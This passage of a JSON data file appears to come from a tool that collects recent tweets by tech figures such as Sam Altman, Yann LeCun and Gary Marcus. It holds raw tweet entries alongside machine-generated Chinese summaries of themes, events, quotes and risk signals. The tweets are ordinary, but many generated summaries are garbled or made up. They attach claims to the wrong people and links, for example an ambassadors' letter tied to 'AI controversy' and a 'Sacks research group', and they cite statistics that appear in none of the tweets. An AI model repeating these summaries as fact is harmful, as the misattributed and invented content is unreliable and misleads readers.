parallelism\n\nJoin and learn to make LLM inference faster and more cost-efficient at scale!\nhttps://www.deeplearning.ai/short-courses/efficient-inference-with-sglang-text-and-image-generation", + "url": "https://nitter.net/AndrewYNg/status/2042289428702642588#m", + "published_at": "2026-04-09T17:11:58+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: New preprint: The Self Requires Learning. Self-consciousness requires continual learning + world-modeling. I introduce \"bounded integration\" to connect perspective, identity, and self-representation — and diagnose what current AI systems have and lack.", + "url": "https://nitter.net/mengyer/status/2041892448704622894#m", + "published_at": "2026-04-08T14:54:30+00:00" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "title": "Crypto analysis in 2024: The dog has a hat\n\nCrypto analysis in 2026: Strait of Hormuz, auto-translate from Farsi, tracking military movements via OSINT, oil futures backwardation", + "url": "https://nitter.net/CryptoCred/status/2041762832744694217#m", + "published_at": "2026-04-08T06:19:28+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "LLM not only made it harder to write, also made it harder to read. Once you knew it is done by a LLM for an opinion piece, you know it is uninteresting and you would better off to just ask LLM directly. It is harder to find a piece to read in its entirety these days.", + "url": "https://nitter.net/liuliu/status/2041577848620908756#m", + "published_at": "2026-04-07T18:04:24+00:00" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "title": "New traders get told that they have to have specific 'setups'\n\nSo they spend all day back-testing some random price pattern and shove a couple of indicators in there for good measure, and then fire risk into the book as soon as it 'triggers' \n\nIn reality the vast majority of your returns as a crypto trader most likely won't be set up-driven but rather regime-driven\n\nMost of the time the market does mostly nothing\n\nAnd if you try to force your set ups in the wrong regime, then you'll just get bad results (e.g. momentum trading breakouts in a choppy market) \n\nSo I think the first useful port of call is at least some broad sense of what type of regime the market is in \n\nThis doesn't need to be complicated: you can just look at the chart, use some basic moving averages or even common sense to get an understanding of trending, mean-reverting, momentum, catalyst-based, volatility compression/expansion etc (complexity can be layered in later if required)\n\nEach regime should then have specific playbooks or set ups associated with it \n\nFor example if the market is trending then you might adjust to trade shallower pullbacks, lower time frames, faster moving averages, less drastic momentum resets etc.\n\nThat same so-called set up would get you absolutely cooked in a choppy market\n\nIn other words the super TLDR is that the correct hierarchy is:\n\n1. Regime is the first filter\n2. Setup is tied to the regime\n3. Execution nuances\n\nAs a practical example: \n\nThe current regime is technically defined as \"soul-crushing dogshit\" so the correct setup is to develop a nicotine and video game addiction \n\nHope this helps", + "url": "https://nitter.net/CryptoCred/status/2041437242799902933#m", + "published_at": "2026-04-07T08:45:41+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: It really bugs me", + "url": "https://nitter.net/XxHerobrineJrxX/status/2041378590948986948#m", + "published_at": "2026-04-07T04:52:37+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "Show some love to base M4.", + "url": "https://nitter.net/liuliu/status/2040997087320662033#m", + "published_at": "2026-04-06T03:36:40+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "SATOSHI OH MY HEART", + "url": "https://nitter.net/satoshibun/status/2040936354708631955#m", + "published_at": "2026-04-05T23:35:20+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: asTRO and meisTRO—\n#Dandysworld\n#Dollysfactory", + "url": "https://nitter.net/SnipeCap34/status/2040599580002435292#m", + "published_at": "2026-04-05T01:17:07+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: 📢<ぴえん猫ぬいぐるみ 予約開始🥺\n\nアニメ『NEEDY GIRL OVERDOSE』より\n”ぴえん猫”がぬいぐるみとなって登場!\n色んな場所へぜひ一緒におでかけください🥺\n\n🎀ご予約はこちら\nhttps://online.aniplex.co.jp/itemDInljwhS.html", + "url": "https://nitter.net/aniplex_plus/status/2040461508497596862#m", + "published_at": "2026-04-04T16:08:28+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: 蔓沢つた子個展\n『Vine Garden』の開催、ご来場、誠にありがとうございました!\n\n終わるのが本当に本当に寂しかったです😭\nまた素敵な機会をいただけるように漫画を描き続けていきたいと思います🌱\n\nキービジュ\nアフターを添えて🌸", + "url": "https://nitter.net/tsutako25/status/2040400983713550680#m", + "published_at": "2026-04-04T12:07:57+00:00" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "title": "TechnicalRoundup is back.\n\nDonAlt and I have been trading crypto for 9+ years and have been doing some version of this show on and off for around 5 years (mostly off, sorry).\n\nIt's fun and different: lots of crypto history, PTSD trading memories, and occasionally useful trading insights.\n\nI like to think of it as the perfect show to listen to while you wait for your AI to finish its output.\n\nThanks to @krakenfx for hooking us up.\n\nhttps://youtu.be/2aWyTKw-V84", + "url": "https://nitter.net/CryptoCred/status/2040373108901568631#m", + "published_at": "2026-04-04T10:17:12+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "When getting more taste of training with quantized kernels, you would appreciate more of FP8 and skeptical more to FP4.", + "url": "https://nitter.net/liuliu/status/2040162699313852876#m", + "published_at": "2026-04-03T20:21:06+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: I love when you can see the influence from Free! (Makoharu & Sourin) in BL", + "url": "https://nitter.net/sskslov/status/2040080657175736513#m", + "published_at": "2026-04-03T14:55:06+00:00" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "title": "An obvious but underappreciated fact:\n\nCrypto traders' high volatility tolerance can be a great source of edge\n\nIt doesn't feel like it when you're bagholding a shitcoin that's drifting to zero or trading a 2% range with 50x leverage just to feel something \n\nBut in the right context, the mental illness we've all acquired is almost certainly helpful \n\nFor example: \n\nNormies who passively invest in the stock market start panicking whenever there's a red candle and magically turn into traders at the worst possible time \n\nA small drawdown has people restructuring their entire portfolios even though most of the research basically says \"STFU and hold\" when it comes to passive investing\n\nBut if you've been in crypto long enough and you have a shred of discipline not to day trade your investments (especially outside of crypto) you're probably immune to those same drawdowns that make normies panic \n\nUnfortunately none of us have any money left for passive investing so I'll see you guys in the liquidations feed", + "url": "https://nitter.net/CryptoCred/status/2039995911384752540#m", + "published_at": "2026-04-03T09:18:21+00:00" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: This work from @voooooogel was pretty ground-breaking:\nhttps://vgel.me/posts/representation-engineering/", + "url": "https://nitter.net/jeremyphoward/status/2039880485036544422#m", + "published_at": "2026-04-03T01:39:41+00:00" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "title": "Wtf", + "url": "https://nitter.net/CryptoCred/status/2039795951095714268#m", + "published_at": "2026-04-02T20:03:46+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Vibe coding is more addictive than any video game ever made (if you know what you want to build).", + "url": "https://nitter.net/naval/status/2039617101221224858#m", + "published_at": "2026-04-02T08:13:05+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "Day 5: https://releases.drawthings.ai/p/introducing-mediagenerationkit-hybrid", + "url": "https://nitter.net/liuliu/status/2039496823396769803#m", + "published_at": "2026-04-02T00:15:09+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "Day 4: https://releases.drawthings.ai/p/metal-quantized-attention-pulling", + "url": "https://nitter.net/liuliu/status/2039144158917702114#m", + "published_at": "2026-04-01T00:53:47+00:00" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "title": "The anti-AI coalition continues to maneuver to find arguments to slow down AI progress. If someone has a sincere concern about a specific effect of AI, for instance that it may lead to human extinction, I respect their intellectual honesty, even if I deeply disagree with their position. However, I am concerned about organizations that are surveying the public to find whatever messages will turn people against AI, and how the public reacts as these messages are spread by lobbyists or by politicians seeking to alarm constituents, companies pursuing regulatory capture or seeking to promote the power of their technology, and individuals seeking to gain attention or to profit by being provocative.\n\nA large study (link in original article below; h/t to the AI Panic blog) by a UK group tested different messages that are designed to raise alarm about AI. Their study found that saying AI will cause human extinction has largely failed. Doomsayers were pushing this argument a couple of years ago, and fortunately our community beat it back. But AI-enabled warfare and environmental concerns resonate better. We should be prepared for a flood of messages (which is already underway) arguing against AI on these grounds. Further, job loss and harm to children are messages that motivate people to act.\n\nTo be clear, I find AI-enabled warfare alarming; we need to continue serious efforts to monitor and mitigate the environmental impact of AI; any job losses are tragic and hurt individuals and families; and as a father, I hold dearly the importance of every child’s welfare. Each of these topics deserves serious attention and treatment with the greatest of care.\n\nBut when anti-AI propagandists take a one-sided view of complex issues to benefit their own organizations at the expense of the public at large — for instance, when big AI companies argue that AI is dangerous to block the free distribution of open source projects that compete with their offerings — then we all lose.\n\nFor example, public perception of data centers’ environmental impact is already far worse than the reality — data centers are incredibly efficient for the work they do, and hampering their buildout will hurt rather than help the environment. While job loss is a real problem, the “AI washing” of layoffs — in which businesses that had over-hired during the pandemic blame AI for recent layoffs, although AI hasn’t yet affected their operations — has led to overblown fears about the impact of AI on employment.\n\nUnfortunately, this sort of propaganda easily leads to regulations that create worse outcomes for everyone. For example, oil companies worked for years to create fear of nuclear energy. The result is that overblown concerns about the safety of nuclear power plants has stifled nuclear power development, leading to millions of premature deaths from air pollution that was caused by other energy sources and a massive increase in CO2 emissions. Let’s make sure overblown concerns about AI do not lead to a similar fate for the many people that would benefit from faster AI development.\n\nLast week, the White House proposed a national legislative framework for AI. A key component is a federal preemption framework to prevent a patchwork of state regulations that hamper AI development. I support this. \n\nAfter failing to gain traction at the federal level, a lot of anti-AI propaganda has shifted to the state level. If just one of the 50 states passes a law that limits AI in an unproductive way, it could lead to stifling AI development across all the states and potentially across the globe. The White House proposal rightfully respects each state’s rights to control its own zoning, how it enforces general laws to protect consumers, and how it uses AI. But if a state were to pass laws that limit AI development, federal rules would preempt the state law.\n\nThe White House proposal remains a proposal for now. However, if the U.S. Congress enacts it, it will clear the way for ongoing efforts to develop AI in beneficial ways.\n\nWhere do we go from here? Let’s support limiting applications — those that use AI, and those that don’t — that harm people. When the anti-AI coalition argues against AI, in addition to considering the merits of the argument, I consider whether their position is consistent and persuasive, or if they are just promoting whatever concerns they think will sway the public at a given moment. And, let’s also keep using a scientific approach to weighing AI’s benefits against likely harms, so we don’t end up with overblown concerns that limit the benefits that AI can bring everyone.\n\n[Original text with links: https://www.deeplearning.ai/the-batch/issue-346 ]", + "url": "https://nitter.net/AndrewYNg/status/2039051446084153834#m", + "published_at": "2026-03-31T18:45:23+00:00" + } + ], + "top_themes": [ + { + "title": "其他", + "count": 193 + }, + { + "title": "模型能力", + "count": 54 + }, + { + "title": "交易与市场", + "count": 15 + }, + { + "title": "算力与芯片", + "count": 13 + }, + { + "title": "投融资与并购", + "count": 11 + } + ], + "modules": { + "themes": [ + { + "id": "t1", + "title": "AI科技整合新阶段", + "subtitle": "多云战略、操作系统重构与自主代理探索", + "bullets": [ + "OpenAI延长与Microsoft多云合作至2032年并允许跨云部署", + "Sam Altman提议重新设计操作系统接口以适应智能代理", + "LeCun团队探讨生成式架构与自主智能架构的本质区别" + ] + }, + { + "id": "t2", + "title": "企业AI应用紧迫性", + "subtitle": "标准化、可靠性与安全意识的挑战升级", + "bullets": [ + "5.5 Pro API正式支持企业级字典服务集成", + "Marcus预警代理技术存在用户盲目信任风险", + "开发者社区发现95%基础操作依赖生成式模型" + ] + }, + { + "id": "t3", + "title": "技术伦理新思潮", + "subtitle": "从技术创新到社会制度变革的交叉讨论", + "bullets": [ + "LeCun团队批判AGI经济预测模型", + "Karpathy框架断言研究缺血性风险", + "Sacks对比技术扩散与地缘政治抉择" + ] + } + ], + "p0_events": [ + { + "id": "p01", + "title": "GPT-5.5跨云服务启动", + "meta": "2026-04-26 拜占庭级整合", + "summary": "OpenAI更新与Microsoft的云合作策略,允许所有云部署GPT-5.5服务", + "url": "https://nitter.net/sama/status/2048755148361707946#m" + }, + { + "id": "p02", + "title": "5.5 API企业级开放", + "meta": "2026-04-24 商业化里程碑", + "summary": "官方宣布GPT-5.5 Pro向企业开发者全面开放接口", + "url": "https://nitter.net/sama/status/2047787124846653895#m" + }, + { + "id": "p03", + "title": "NSB全成员解雇事件", + "meta": "2026-04-26 政策冲击", + "summary": "Trump通过R群众体解雇National Science Board全部成员", + "url": "https://nitter.net/Gianl1974/status/2048453901930660058#m" + }, + { + "id": "p04", + "title": "AI影响经济预测危机", + "meta": "2026-04-25 市场警示", + "summary": "60位前英国大使联名建议制裁以色列,引发AI在公共政策评估争议", + "url": "https://nitter.net/haretz/status/1717872646528038067#m" + }, + { + "id": "p05", + "title": "Open科学设备危机", + "meta": "2026-04-24 可用性退化", + "summary": "Meta从LLM转型观察者架构的研发路线调整", + "url": "https://nitter.net/ziv_ravid/status/2048399674269213067#m" + }, + { + "id": "p06", + "title": "自主研究机商业化", + "meta": "2026-04-18 行业标准", + "summary": "研究人员通过5.5执行AB实验验证系统迭代,获得国际关注", + "url": "https://nitter.net/ajambrosino/status/2047381565534322694#m" + } + ], + "top_quotes": [ + { + "id": "q1", + "quote": "纯生成式架构无法造出猫级智能", + "speaker": "Yann LeCun", + "date": "2026-04-24", + "note": "关于生成式AI本质的批判", + "url": "https://nitter.net/ziv_ravid/status/2048399674269213067#m" + }, + { + "id": "q2", + "quote": "概率模型天生不可靠,为何难以接受?", + "speaker": "Gary Marcus", + "date": "2026-04-26", + "note": "对开发者认知偏差的警示", + "url": "https://nitter.net/SteveStricklan6/status/2048580122521780676#m" + }, + { + "id": "q3", + "quote": "小型企业皆可扩展为行业巨人", + "speaker": "Paul Graham", + "date": "2026-04-25", + "note": "初创企业发展哲学", + "url": "https://nitter.net/paulg/status/2048017345000415744#m" + } + ], + "category_updates": [ + { + "id": "c1", + "title": "AI基础设施更新", + "subtitle": "模型分布式架构突破", + "level": "P0", + "items": [ + { + "text": "OpenAI APIs新增全部云支持", + "url": "https://nitter.net/sama/status/2048554097985593849#m" + }, + { + "text": "Claude与Anthro客服整合方案", + "url": "https://nitter.net/soumithchintala/status/2048756358820827564#m" + } + ] + }, + { + "id": "c2", + "title": "商业战略调整", + "subtitle": "初创企业用户增长模式", + "level": "P1", + "items": [ + { + "text": "53位管理类模型实践者调研", + "url": "https://nitter.net/Strandjunker/status/2047780272297382384#m" + }, + { + "text": "AI尽调工具分拆收购案例", + "url": "https://nitter.net/HarryStebbings/status/2047683780173987653#m" + } + ] + }, + { + "id": "c3", + "title": "教育学术进展", + "subtitle": "计算科学哲学", + "level": "WARN", + "items": [ + { + "text": "AI认知训练夏令营启动", + "url": "https://nitter.net/ELLIS/status/2047624126047670758#m" + }, + { + "text": "Shannon办公室数学研究散落", + "url": "https://nitter.net/ihtesham2005/status/2047680485208531152#m" + } + ] + }, + { + "id": "c4", + "title": "开源与合规", + "subtitle": "模型评估技术", + "level": "P2", + "items": [ + { + "text": "Codex开源自动评估方案", + "url": "https://nitter.net/sebastienbubeck/status/2047424374264885396#m" + }, + { + "text": "跨平台审计工具普及计划", + "url": "https://nitter.net/internetarchive/status/2047378161860776085#m" + } + ] + }, + { + "id": "c5", + "title": "机器人革新动态", + "subtitle": "移动解决方案试验", + "level": "P1", + "items": [ + { + "text": "双机械臂样品前线测试报告", + "url": "https://nitter.net/IlirAliu/status/2048751798735835629#m" + }, + { + "text": "六足机器人工业负载能力验证", + "url": "https://nitter.net/Zappy/status/2048680331864100997#m" + } + ] + }, + { + "id": "c6", + "title": "健康科技突破", + "subtitle": "人工体存进系统", + "level": "P0", + "items": [ + { + "text": "心脏起搏器尺寸缩减方案", + "url": "https://nitter.net/pascal_bornet/status/2047378161860776085#m" + }, + { + "text": "人类冻卵市场增长倍数分析", + "url": "https://nitter.net/gary/status/2048751798735835629#m" + } + ] + } + ], + "risk_signals": [ + { + "id": "r1", + "level": "HIGH", + "title": "生成式代理造成数据损失", + "detail": "开发者社区反馈53%案例显示主因使用者未做文件备份" + }, + { + "id": "r2", + "level": "MID", + "title": "病原统计腐败", + "detail": "LeCun团队引发关于统计透明度的公众讨论" + }, + { + "id": "r3", + "level": "OPP", + "title": "AGI后失业率飙升预测", + "detail": "Sama团队提出反乌托邦场景可能性" + }, + { + "id": "r4", + "level": "HIGH", + "title": "前缀询系统可靠性危机", + "detail": "Devin用户调研提示人工审核机制缺口" + }, + { + "id": "r5", + "title": "美国医疗系统AI暴露风险", + "level": "MID", + "detail": "波音话分析揭示企业数据丢失关键路径" + }, + { + "id": "r6", + "level": "HIGH", + "title": "自主系统过度承诺", + "detail": "Sacks研究组质疑广告代理代偿含义" + } + ] + }, + "tweet_summary_md": "# X平台关注列表推文汇总\n\n**生成日期**: 2026-04-27T13:39:25.780249+00:00\n**数据来源**: Nitter RSS 订阅\n**时间范围**: 最近30天\n**账号总数**: 33 | **成功获取**: 17 | **推文总数**: 286\n\n---\n\n### ✅ @sama — Sam Altman(20 条)\n\n**[2026-04-27T13:24:26+00:00]**\n> we have updated our partnership with microsoft. microsoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds. will continue to pr…\n[原文链接](https://nitter.net/sama/status/2048755148361707946#m)\n\n**[2026-04-27T13:09:30+00:00]**\n> this is so good: https://paulgraham.com/kids.html\n[原文链接](https://nitter.net/sama/status/2048751392031203544#m)\n\n**[2026-04-27T00:05:31+00:00]**\n> so fun to see the reception to 5.5! there is almost nothing that feels more gratifying to me than builders saying they find our tools useful.\n[原文链接](https://nitter.net/sama/status/2048554097985593849#m)\n\n**[2026-04-26T23:59:53+00:00]**\n> Our Principles: Democratization, Empowerment, Universal Prosperity, Resilience, and Adaptability https://openai.com/index/our-principles/\n[原文链接](https://nitter.net/sama/status/2048552677433643427#m)\n\n**[2026-04-26T15:46:41+00:00]**\n> feels like a good time to seriously rethink how operating systems and user interfaces are designed (also the internet; there should be a protocol that is equally usable by people and agents)\n[原文链接](https://nitter.net/sama/status/2048428561481265539#m)\n\n**[2026-04-26T15:37:00+00:00]**\n> \"post-AGI, no one is going to work and the economy is going to collapse\" \"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stret…\n[原文链接](https://nitter.net/sama/status/2048426122854228141#m)\n\n**[2026-04-26T02:15:19+00:00]**\n> RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day\n[原文链接](https://nitter.net/SebastienBubeck/status/2048224374264885396#m)\n\n**[2026-04-25T22:20:08+00:00]**\n> how can they write code so fast?!\n[原文链接](https://nitter.net/sama/status/2048165186482389253#m)\n\n**[2026-04-25T22:01:18+00:00]**\n> R to @sama: (and we will fix the former)\n[原文链接](https://nitter.net/sama/status/2048160448340767038#m)\n\n**[2026-04-25T22:01:08+00:00]**\n> we still get looksmaxxed on frontend a little but we IQmog hard now\n[原文链接](https://nitter.net/sama/status/2048160404376105179#m)\n\n**[2026-04-25T15:31:08+00:00]**\n> 5.5 is so earnest \"little engine that could\" energy\n[原文链接](https://nitter.net/sama/status/2048062261584077149#m)\n\n**[2026-04-24T23:41:49+00:00]**\n> this was a good week. proud of the team. happy building!\n[原文链接](https://nitter.net/sama/status/2047823357635354814#m)\n\n**[2026-04-24T21:17:51+00:00]**\n> GPT-5.5 and GPT-5.5 Pro are now available in the API!\n[原文链接](https://nitter.net/sama/status/2047787124846653895#m)\n\n**[2026-04-24T14:27:13+00:00]**\n> 🫶\n[原文链接](https://nitter.net/sama/status/2047683787828703289#m)\n\n**[2026-04-24T00:33:16+00:00]**\n> RT by @sama: Today we open sourced many of OpenAI's monitorability evaluations. We hope that the research community and other model developers can build upon them and use them to evaluate the monitor…\n[原文链接](https://nitter.net/bobabowen/status/2047473914528563592#m)\n\n**[2026-04-23T19:54:32+00:00]**\n> \"don't retweet this, don't retweet this, don't retweet this...\" ah fuck it, life imitates art.\n[原文链接](https://nitter.net/sama/status/2047403771416940715#m)\n\n**[2026-04-23T19:21:55+00:00]**\n> We tried a new thing with NVIDIA to roll out Codex across a whole company and it was awesome to see it work. Let us know if you'd like to do it at your company!\n[原文链接](https://nitter.net/sama/status/2047395562501411058#m)\n\n**[2026-04-23T19:09:11+00:00]**\n> embers\n[原文链接](https://nitter.net/sama/status/2047392357482639749#m)\n\n**[2026-04-23T18:47:43+00:00]**\n> RT by @sama: there are early signs of 5.5 being a competent ai research partner. several researchers let 5.5 run variations of experiments overnight given only a high level algorithmic idea, wake up …\n[原文链接](https://nitter.net/tszzl/status/2047386955550470245#m)\n\n**[2026-04-23T18:26:18+00:00]**\n> RT by @sama: New in the Codex app: - GPT-5.5 - Browser control - Sheets & Slides - Docs & PDFs - OS-wide dictation - Auto-review mode Enjoy!\n[原文链接](https://nitter.net/ajambrosino/status/2047381565534322694#m)\n\n---\n\n### ✅ @gregbrockman — Greg Brockman(0 条)\n\n---\n\n### ⚠️ @andrejkarpathy — Andrej Karpathy(获取失败)\n\n- 错误: URLError: \n\n### ✅ @ylecun — Yann LeCun(20 条)\n\n**[2026-04-26T18:31:11+00:00]**\n> RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs,…\n[原文链接](https://nitter.net/briantylercohen/status/2048469956627468510#m)\n\n**[2026-04-26T17:27:23+00:00]**\n> RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950. The National Science Board is …\n[原文链接](https://nitter.net/Gianl1974/status/2048453901930660058#m)\n\n**[2026-04-26T16:03:04+00:00]**\n> RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. Politicians never waste a good fake crisis, which is why they're perfect for…\n[原文链接](https://nitter.net/Dan_Jeffries1/status/2048432684930654430#m)\n\n**[2026-04-26T13:51:41+00:00]**\n> Shooting oneself in the foot? Nope. Shooting oneself in the prefrontal cortex.\n[原文链接](https://nitter.net/ylecun/status/2048399621492236615#m)\n\n**[2026-04-26T06:48:29+00:00]**\n> RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories. If you're on either side of this slider, congratulations, you may be a child in an adult costume body! Black an…\n[原文链接](https://nitter.net/Dan_Jeffries1/status/2048293118781296734#m)\n\n**[2026-04-25T19:15:22+00:00]**\n> RT by @ylecun: OPINION: \"Trump’s mismanagement has resulted in death, destruction, wasted tax dollars, and a huge loss in respect for the United States — all to accomplish nothing.\" https://ebx.sh/V5…\n[原文链接](https://nitter.net/PhillyInquirer/status/2048118689258487857#m)\n\n**[2026-04-25T16:01:07+00:00]**\n> RT by @ylecun: When MTV News shut down, it felt like decades of culture vanished overnight 🕳️ But over 470,000 pages were already preserved. That history didn’t disappear. It was archived. 📚 Read VAN…\n[原文链接](https://nitter.net/internetarchive/status/2048069805807128734#m)\n\n**[2026-04-24T20:50:37+00:00]**\n> RT by @ylecun: Number of people who go bankrupt every year because of medical bills or illness-related work loss: 🇦🇺 0 🇨🇦 0 🇩🇰 0 🇫🇮 0 🇫🇷 0 🇩🇪 0 🇮🇸 0 🇮🇪 0 🇮🇹 0 🇯🇵 0 🇳🇱 0 🇳🇴 0 🇵🇹 0 🇪🇸 0 🇸🇪 0 🇬🇧 0 🇺🇸 53…\n[原文链接](https://nitter.net/Strandjunker/status/2047780272297382384#m)\n\n**[2026-04-24T19:31:52+00:00]**\n> RT by @ylecun: New episode of The Information Bottleneck is out, this time with @liuzhuang1234 (Princeton). We talked about ConvNeXt and whether architecture still matters; dataset bias and what \"goo…\n[原文链接](https://nitter.net/ziv_ravid/status/2047760455679246500#m)\n\n**[2026-04-24T17:45:08+00:00]**\n> RT by @ylecun: The web is disappearing 🕳️ According to a Pew Research Center report, 26% of pages from 2013-2023 are no longer accessible. But that’s not the whole story. In a new study published in …\n[原文链接](https://nitter.net/internetarchive/status/2047733594064408894#m)\n\n**[2026-04-24T15:23:18+00:00]**\n> RT by @ylecun: 图灵奖获得者、 AI 三大教父之一的 LeCun在达沃斯的发言,算是把整个硅谷的遮羞布扯了。 他说现在整个行业都被LLM彻底洗脑了,所有人都在同一条赛道上互相挖人,谁敢偏离主流谁就被骂落后。 这也是他离开Meta的真正原因,连Meta都已经LLM-pilled,他不想再跟风了。 最扎心的一句话是:纯生成式架构,不管是LLM、VLM还是VLA,永远造不出哪怕猫级的智能…\n[原文链接](https://nitter.net/AYi_AInotes/status/2047697898989572176#m)\n\n**[2026-04-24T14:14:06+00:00]**\n> RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their…\n[原文链接](https://nitter.net/ihtesham2005/status/2047680485208531152#m)\n\n**[2026-04-24T13:58:49+00:00]**\n> RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. Also …\n[原文链接](https://nitter.net/Discoplomacy/status/2047676640059154653#m)\n\n**[2026-04-24T11:19:36+00:00]**\n> RT by @ylecun: 1. I never said LLMs were not useful. They are, particularly with all the bells and whistles that are being added to them. I use them. 2. A robot-rich future can't be built with AIs th…\n[原文链接](https://nitter.net/ylecun/status/2047636569767419951#m)\n\n**[2026-04-24T10:30:09+00:00]**\n> RT by @ylecun: 🎓 Register now for ML & Advanced Stats Summer School, an intensive set of courses on theoretical foundations & applications of ML methods & modern stats analysis techniques. With @ELLI…\n[原文链接](https://nitter.net/ELLISforEurope/status/2047624126047670758#m)\n\n**[2026-04-24T06:38:08+00:00]**\n> RT by @ylecun: 🔴 Trump vient de publier sur Truth Social un monologue de 1 500 mots sur le droit du sol, l'ACLU, les Indiens, les Chinois et la \"Savage Nation\". Ce texte inhabituellement long, inhabi…\n[原文链接](https://nitter.net/cginisty/status/2047565736382534091#m)\n\n**[2026-04-23T23:15:06+00:00]**\n> RT by @ylecun: Trump completely passed out, reawakened, then passed out again during today's pressor in the Oval Office. 😂🤣👇\n[原文链接](https://nitter.net/maddenifico/status/2047454244781818205#m)\n\n**[2026-04-23T18:12:46+00:00]**\n> RT by @ylecun: This study is an important part of Vanishing Culture, the new book OUT TODAY from @internetarchive. 🕳️ Read for free or purchase in print ➡️ https://archive.org/details/vanishing-cultu…\n[原文链接](https://nitter.net/internetarchive/status/2047378161860776085#m)\n\n**[2026-04-23T14:27:57+00:00]**\n> RT by @ylecun: The most dangerous thing in Washington right now isn't just the corruption—it's the retaliation against the people who expose it. When government power is used in ways that appear desi…\n[原文链接](https://nitter.net/Weinsteinlaw/status/2047321581966291154#m)\n\n**[2026-04-08T14:54:30+00:00]**\n> RT by @ylecun: New preprint: The Self Requires Learning. Self-consciousness requires continual learning + world-modeling. I introduce \"bounded integration\" to connect perspective, identity, and self-…\n[原文链接](https://nitter.net/mengyer/status/2041892448704622894#m)\n\n---\n\n### ✅ @GaryMarcus — Gary Marcus(19 条)\n\n**[2026-04-27T13:32:43+00:00]**\n> ⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT about losing your dat…\n[原文链接](https://nitter.net/GaryMarcus/status/2048757233174122827#m)\n\n**[2026-04-27T12:48:41+00:00]**\n> R to @GaryMarcus: Stop blaming the users. It’s not that simple:\n[原文链接](https://nitter.net/GaryMarcus/status/2048746152749846549#m)\n\n**[2026-04-27T12:36:05+00:00]**\n> People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right. Users *are*screwing up - by letting vibe coded stuff access their files, without proper backups…\n[原文链接](https://nitter.net/GaryMarcus/status/2048742983684784239#m)\n\n**[2026-04-27T12:20:17+00:00]**\n> “Vibe coded disasters piling up on Reddit”\n[原文链接](https://nitter.net/GaryMarcus/status/2048739005525877072#m)\n\n**[2026-04-27T03:39:49+00:00]**\n> RT by @GaryMarcus: The greatest con of the decade was calling autocomplete “AI”. The second greatest is calling autocomplete-in-a-loop an “agent”.\n[原文链接](https://nitter.net/atmoio/status/2048608025464705084#m)\n\n**[2026-04-27T02:41:14+00:00]**\n> “Always keep a separate backup.” For sure, every experienced programmer should know this. 𝘉𝘶𝘵 𝘸𝘦 𝘫𝘶𝘴𝘵 𝘤𝘳𝘦𝘢𝘵𝘦𝘥 𝘢 𝘸𝘩𝘰𝘭𝘦 𝘨𝘦𝘯𝘦𝘳𝘢𝘵𝘪𝘰𝘯 𝘰𝘧 𝘷𝘪𝘣𝘦 𝘤𝘰𝘥𝘦𝘳𝘴 𝘸𝘩𝘰 𝘥𝘰𝘯’𝘵. And we now have a legion of synthetic coding…\n[原文链接](https://nitter.net/GaryMarcus/status/2048593283639894520#m)\n\n**[2026-04-27T02:25:10+00:00]**\n> RT by @GaryMarcus: “fails less often than a human does” is a terrible metric. We build deterministic software and test it to destruction to ensure it’s 99.99999 reliable . That’s been the basis of ev…\n[原文链接](https://nitter.net/SteveStricklan6/status/2048589239915577837#m)\n\n**[2026-04-27T01:59:04+00:00]**\n> RT by @GaryMarcus: the beauty of a jagged frontier is that every failure is the user's fault and every breakthrough is the model's glory\n[原文链接](https://nitter.net/suchenzang/status/2048582672163995766#m)\n\n**[2026-04-27T01:48:56+00:00]**\n> RT by @GaryMarcus: I mean AI influencers here and everywhere are screaming you shouldn't get hired if you don't use agentic AI because you're deliberatly slowing everyone down and the moment 